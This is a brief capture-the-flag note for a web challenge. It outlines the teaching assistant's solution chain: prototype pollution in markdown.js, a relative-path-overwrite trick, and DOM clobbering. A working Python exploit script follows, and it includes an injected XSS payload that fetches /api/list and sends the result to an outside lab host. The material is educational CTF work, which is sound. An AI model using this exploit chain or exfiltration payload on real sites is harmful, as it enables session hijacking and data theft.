# CTF note
* site : http://ctf-note.splitline.tw:9527/login
* 感覺是 XSS 應該
* 助教解
1. prototype pollution markdown.js --> XSS
2. RPO attack --> make config.js 404
3. DOM Clobbering --> create a nyanCat plugin yourself
```
#!/usr/bin/env python3
import requests
import secrets
base_url = "http://ctf-note.splitline.tw:9527"
xss_script = "http://lab.splitl.in:8000/xss.js"
"""
// xss.js
fetch('/api/list').then(r=>r.text())
.then(r=>location = "http://lab.splitl.in:8000/meow?c="+r)
"""
req = requests.session()
req.post(f"{base_url}/login", data={
"username": secrets.token_urlsafe(32),
"password": secrets.token_urlsafe(32),
})
res = req.post(f"{base_url}/api/add", json={
"contestName": "PoC",
"writeups": [
{
"category": "Web",
"challenge": "xss",
"content": "owo?"
},
{
"category": "__proto__", # prorotype pollution: markdown.js attributes
"challenge": f"""
><iframe name=CONFIG srcdoc="
<iframe srcdoc='<a id=nyanCat href={xss_script}>test</a>' id=CONFIG name=plugins>
"></iframe><""", # DOM clobbering: `CONFIG.plugins.nyanCat`
"content": "whatever"
}
]})
print(res.content)
res = res.json()
print("[+] session =", req.cookies['session'])
malicious_url = f"{base_url}/meow/..%2f#{res['uuid']}" # make `config.js` 404
print("[+] malicious url =", malicious_url)
res = req.post(f"{base_url}/report", data={"url": malicious_url})
print(res.text)
```
###### tags: `unsolved`
Sign in with Wallet
Connect another wallet